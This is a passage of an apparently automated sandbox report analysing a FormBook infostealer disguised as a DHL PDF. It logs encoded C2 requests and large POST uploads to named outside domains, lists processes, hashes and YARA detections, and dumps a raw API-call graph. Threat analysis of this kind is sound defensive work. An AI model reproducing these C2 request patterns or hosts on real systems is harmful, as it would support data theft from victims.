                                                          3 | 192.168.2.3 | 49701 | 198.46.160.97 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:07:41.091881037 CET | 257 | OUT | GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1
                                                          Host: www.0dhy.xyz
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:07:41.210010052 CET | 257 | IN | HTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 21 Mar 2023 07:07:41 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 264
                                                          Connection: close
                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          4 | 192.168.2.3 | 49702 | 219.94.129.181 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:07:47.061011076 CET | 258 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.kunimi.org
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.kunimi.org
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.kunimi.org/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Ascii: bcX3Uv=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIvjCo0N7PzZ1I9jODcQ).
                                                          Mar 21, 2023 08:07:48.162316084 CET | 260 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:07:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/7.4.33
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          5 | 192.168.2.3 | 49703 | 219.94.129.181 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:07:50.112668991 CET | 360 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.kunimi.org
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.kunimi.org
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.kunimi.org/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Mar 21, 2023 08:07:50.723227024 CET | 362 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:07:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/7.4.33
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          6 | 192.168.2.3 | 49704 | 219.94.129.181 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:07:52.935645103 CET | 456 | OUT | GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1
                                                          Host: www.kunimi.org
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:07:53.796298027 CET | 457 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:07:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Powered-By: PHP/7.4.33
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Location: http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA==
                                                          Vary: Accept-Encoding


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          7 | 192.168.2.3 | 49705 | 162.0.231.77 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:13.889502048 CET | 459 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.traindic.top
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.traindic.top
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.traindic.top/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 79 6f 39 32 4c 58 32 55 49 66 4d 47 50 4f 4b 31 66 4a 62 56 28 69 74 4d 28 38 56 68 59 34 6e 36 6c 32 30 54 41 4c 44 50 71 72 56 5f 71 4c 69 59 79 4d 34 70 4c 50 77 6a 68 58 6d 62 4a 54 5a 6e 30 33 33 53 7e 68 48 53 44 75 71 73 4b 48 77 41 51 79 6d 33 68 44 59 6b 5a 63 77 6b 61 61 6c 4e 73 61 66 51 51 66 4e 36 46 73 6c 68 46 6e 76 78 36 30 6d 5f 53 66 75 2d 77 43 4d 67 56 46 66 75 61 59 72 78 64 6b 71 55 38 67 56 70 78 6f 75 4d 30 38 6f 4e 77 67 72 74 72 5f 31 49 32 4b 57 35 47 72 6d 6e 47 67 29 2e 00 00 00 00 00 00 00 00
                                                          Data Ascii: bcX3Uv=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oNwgrtr_1I2KW5GrmnGg).
                                                          Mar 21, 2023 08:08:14.177340984 CET | 461 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:13 GMT
                                                          Server: Apache
                                                          Content-Length: 3242
                                                          Connection: close
                                                          Content-Type: text/html


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          8 | 192.168.2.3 | 49706 | 162.0.231.77 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:16.610590935 CET | 469 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.traindic.top
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.traindic.top
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.traindic.top/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Ascii: bcX3Uv=WRFlhw3KAgb5wIN2JwiUZ_MFTeK1GZbR(jRM(-5LfO(6knkTAtvPorV_67ic2M4BLLZQhWWtJVJn3BzSuRHTeeqpNHwHUym3hDFLZdwSabdNtoXQQdl5E8kGMHvx60q8SfvGwGYwVF(uVpbxRQGXsAVQ~4vO7JBm9gHhjMVSzanqLrmpdnZOxLUaV-kQuHdDpg~CosfBY6grc5MZmcMLwwCntJuQ~1QNlmaFx8lnTrTrMc5VUH7DNjBkY1X_6zbFmGsWVjubtzWmkF2v15cAlvxpUWxuLUzaNzyEL3kItjB-ZlCRG-kw9nygBkqNncN01Ffx~YptN4Cn2Xtfn_(467g2PcmIVknRVzLAsvTRuYnrfvUWSE50wcZN9l8cm_bFSSTZqfpQ6pm57WX2qCDFdLoLJhwKqfnws0qGsEcx0rSx4uout1XF(1RNSA46yL1X3dkM~V21RPsRFeafh4~oPkNDz_Et2h6eNR9snE6J(5kOYXjHyDwsQk52S-eFPM0Ia9grFlcgqnJjQLnNpzdqPFVjbje6vzH87Z9k(cIRDQdIZ4PNDOektiVo16xf9ee5rvobRhfKi9Y59Rvr09AWOBQ8pefzNBUEVxDb3NR0R2Xs~KBOWcPfozwHXQorE23yux(8CMHZeK9tthQuyt3Va6gafY3oeaKx3w9UZNyN65naqCChbdpj72THd1uTxSlKiVN2XffvxRv3jEw1oLcZ4u7jFv2qMsCKoj3pHsswtDmdRbJoO_tbouqCiZ3X771t5gKHca(dHhJQnztxDWV4AkOluJo2zVJgsT86nm3texzkzoRMol9SyyL6lwFaY4ROK0HECdLsbFpe7JwfzSMiU6NAJP~KhFqBTgye(YgQlhAFxvbfGrpw9aCOX5uVQZJDBzn0oIglVKv7cErKROFlbA82a2xYOt72sZ0Pl0pPG0hI~1Nalp5OZ8Zruj7p6QxmH0Tpzqc49C~sk2Uz~6CmGF4NlHRTzhEx8GMG~um2Dh5Fkr8cyz4jOH9-eHpxmduutLP8v9NXZIT6~gRxTgcNcSyAqPiN8_nLdfvcDL6_2vMylG~H~ICDg1JLTaLsKFQ02oJaaQCEaMViUkwozApIBqPBXDPbugzW4jRRfEg13HSkmscVV3fl(gYH8rt_~nHyF7VtGxQlM8QHLxICHc~ASgROZrp7k_79b6LC(Qr_r1AW0d~ayHo7h2mkE_W6FYHpJ6koAXZyfcaYg0RN5a4heXt1Et9dd5Hj8KKb2hkeekQkXnltCbxo08khZJ27AMj9jmoTppJYRU5ImahnhzGzFOyhwXyL0W9tLnzPZAX6CEZfVHkuaLIan-WePeFuslaO5Q48wpRnzQHoXO4kwBXFLGB5HzYKaSTg0IOG88enEjV1fl8rxpC0ymYVPN8K8zk6(90dv0cQv0HOx8bQVZdTOlzqOJKdO39yyguuh6UXIaj6GilAVHUWeb75j97JBb62Td(YONuG5IVREOP561HVNXp5EjjQDTUC(73AyQAC523WZOlOUg6lX8SnGArlhvJ7H7oXPQ(4hZl9KLua0OiL(tmm9Rgad1hTAd8xslYOZnZ8PVniFO9OhSu7799LvwucEgCQ94jf74yk3XeMMIWm7j9F2iAMzzwsDJ3R1MqtTz~pkrtfaa1HPPaqVq71FmhsvLWtReOS503qiydVy_Ii0q8FRPWGLEg2MOwdILrQENlDKxD_tlEnikUqWwEM~c41lyWJNjsncEKt5mMPGnJM9Q0rTXP_h_Xy(1IMNDMRLwgaeHvFiOoOF6rEu2d4t6LTgNLVwryzDMxq0LZQzz30c28ZwRqP2w7L4pceS-k4NfkDLJdBkH03Io2Vj0p_RgKmfrJuRhynJzmzoRwB~BWaWNyYQqakZNyUB_4349tVIn5kT_1G1rvtvKR-Uiy6wDuJGwu
jtDK-JKtgvRirgEFlyu7qrPj-XpJ_ugtVqCD9k8vNbWNPsvW3rmgXwnnLsh0LjP(6Kwh93A6jwBWRgpyefcPdHow3xcWiRnQqIDq2AxgXBg4-0MHHKQMB6UfGdZRRyFYt7hPsVowoW_t8odPST6cguPMkVCpI1qvGNTMi~wpAXjeRXlM6~4kvnP5k5_C93UykTQmbZvoHZBdWtsC5g_nCP7(RLAsAvgI5J-O-0-QNpBOXMZw7w9XyaypqKV91WhjQCQ(EdVVVoAOLZx5-408FrJ98bgy98a~Jgjw2OD27JXNkYojU5GPuWXTJrxEg0TPLkqGoVNWNekvOrzUp69GV3PNlD_TVZKeGbsdbiqLfy3fgVpd2dvt1Hw9DQHwA(PMqlgI_c0xoFWCS1xi4TLOMjwHgC2YPLOLQ8Yyh3HNorypruef-hLpgaWQAdLC6gju54jKVHfgX06Qkc0Fi6HWNC_sUnYmGHLHOBLRDLFgfmpNGxOm_YTkp~dcz1UrbWfUxvT2An5qLDHpN1gYCuJnM8ysAuVYKPGC7ret9URRUikt2C5vVBwc_gWZBof2VPXcI8awpoZPbdpGo9JEnA6vehxKv3BVnvdVGWfpvzq84H2pcTwRxJ_uJMAQVIOBdDfWTflTeL7Ng8VxyKRVDqZwGMtOZN6rdz9HgVrjmTwNYz-P7astdgshFXHKN4P58DVbyCW0-lIrn1nT68WzhBKjlxupqqUGsc8diew5z8mTNuyOkkay3OCYMUUKS6H4XYyY-KZeHa_M_YnjKYx4ofU5eacqELtWs4zxL2cbNhLqi01ecl5mLysvc8g9if6qxEEQCM9ESnLTOZdkBbKAEYiGbUmjqSZ2S2IXbmIqT8l7sizQT7s7zbr8as94IpLQ6rV(FKl~lAgjJERjGIxokjhBMFQ1lJdMUe9bc1tT9r65P0pHD8dE3XWIh2K1Q436Bloo_vGmJqkk4t8s8eqfOyv6EdZwAPTqwMGNCGGhqnrfwAp1PbrH3J9WjRoC2Xvu3I4KBU0PjxEm5G_tnZNkkb0(QMYtISoYJ2Gs1FfWwOq18W3DkfsuOsb44GkoOsBHHbflXJIzVF8mo~cYTSqsAPvQPktZF5XVYhgKbKBsCCVeGTgLo4rZhFvpDtu2f2KXmpLmERO2hFPlgPAc22sLe(IuMHtmSRjEPlPIbdF(FzxuqLHRmybsMFz9sAxaLQtZ-omm4CGna1oiFIv5-NsNxYgBd8BOQ~Dwda6O9YIoN0H(aevwXQPSVAP~ADEHWKV2khiy4Rnwf(CG9OwuUPVZHRwh_lzIe9mT7IyqQuF3f0wZ_2pf4gfAHtQM5eePUHis4Rn9oPaFr(yF7TakiQX7uKEq728lPDO3RC4pa6W5_G-vBZhH35VuXMT5GO7GaPC31EHzFYLdmsQteSRZNEazdu-GYAZl4R_V-IcrH0zxqhkAyVe7m3MphU1Jd3ynjU15vb8KtVj0B(nnrhWjlvmfB7XkVQ3JPZN2t9R2NcvelyrKdtGbniSlTzb(sbli2pNYj~rwInPcf5Yv9NgjEN8xXDTnVJ8AopcmkmSbXhhrXN_XRvsevvozDG6x10z8X6xC5r_~e9svv5uQgH_zSy5Qp~v4a0Lt-q7ok5li7DaNoIsLHjLHqxEu0gTdfRBNiBDrvrtx2aS~KI0vQCYObHlNDzFzq9XJ242U3zaoayBgx8naXBXzcLGNZpb4PqxDuGbsl3RCbLuXZ8Hd7aJW_kgJnfZd5lxwlJd~RWv5B(5NASL4yo5qnuYy3hbjPfflhF7iOQrOFf29e557wChSn16a8s0BZ2uCjCyBcw44PlHp3E7lo4ZJaWB23XqMBAspqqqmA3-s-lABjUctwuZkSFKwf4DI4JsJiDW0BEoiQ1pFULiF-cLKPfQvuEiNDmlRS0CRRDe~-sPbBP7~WclSCznCWpJBYQ1f_6yLt3rEbgUQgQUR0Mw8rYEr2fyak3jvBv6v3Iat8pa9RzeO4wlSebAq
MrJVQAlCpe8EPdIiXB8Yz(sQt6YlW1939gTVY0Ey2c27gvudh57a98z~tdmP6NlbmBch2UFFLm63jkpA7qHQnOJuGT4mWlpA_PPTHWPYW9fT2g-jraEosmdvkzSBplXZwhy215RHzhVfW7bNuNgotd6aFmIG
                                                          Mar 21, 2023 08:08:16.897162914 CET | 470 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:16 GMT
                                                          Server: Apache
                                                          Content-Length: 3242
                                                          Connection: close
                                                          Content-Type: text/html


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          9 | 192.168.2.3 | 49707 | 162.0.231.77 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:19.320394993 CET | 473 | OUT | GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1
                                                          Host: www.traindic.top
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:08:19.611036062 CET | 475 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:19 GMT
                                                          Server: Apache
                                                          Content-Length: 3242
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8



                                                          Target ID:0
                                                          Start time:08:06:55
                                                          Start date:21/03/2023
                                                          Path:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          Imagebase:0x400000
                                                          File size:255238 bytes
                                                          MD5 hash:771508CF2751F6DABE05758E4FA25FDF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          Target ID:1
                                                          Start time:08:06:55
                                                          Start date:21/03/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
                                                          Imagebase:0x400000
                                                          File size:5632 bytes
                                                          MD5 hash:BE5A6985BCDCA9064A05D26CFB8D082E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 27%, ReversingLabs
                                                          Reputation:low

                                                          Target ID:2
                                                          Start time:08:06:55
                                                          Start date:21/03/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:3
                                                          Start time:08:06:56
                                                          Start date:21/03/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
                                                          Imagebase:0x400000
                                                          File size:5632 bytes
                                                          MD5 hash:BE5A6985BCDCA9064A05D26CFB8D082E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          Reputation:low

                                                          Target ID:4
                                                          Start time:08:07:00
                                                          Start date:21/03/2023
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff69fe90000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:5
                                                          Start time:08:07:10
                                                          Start date:21/03/2023
                                                          Path:C:\Windows\SysWOW64\cmmon32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                          Imagebase:0xd0000
                                                          File size:36864 bytes
                                                          MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          Reputation:high

                                                            Execution Graph

                                                            Execution Coverage:15.9%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:16.4%
                                                            Total number of Nodes:1385
                                                            Total number of Limit Nodes:25
4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 
API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 
